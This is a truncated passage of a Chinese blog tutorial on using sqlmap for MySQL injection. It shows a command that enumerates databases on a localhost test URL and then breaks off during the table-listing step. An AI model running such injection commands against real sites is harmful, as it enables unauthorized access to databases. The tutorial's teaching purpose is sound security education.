sqlmap之(四)----Mysql注入实战

(1) 查找数据库     [html]  view plain  copy   sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs         数据库有8个。   (2) 通过第一步的数据库查找表(假如数据库名为test)     [html]  view plain  copy   sqlmap.py -u "http:/
相关文章
相关标签/搜索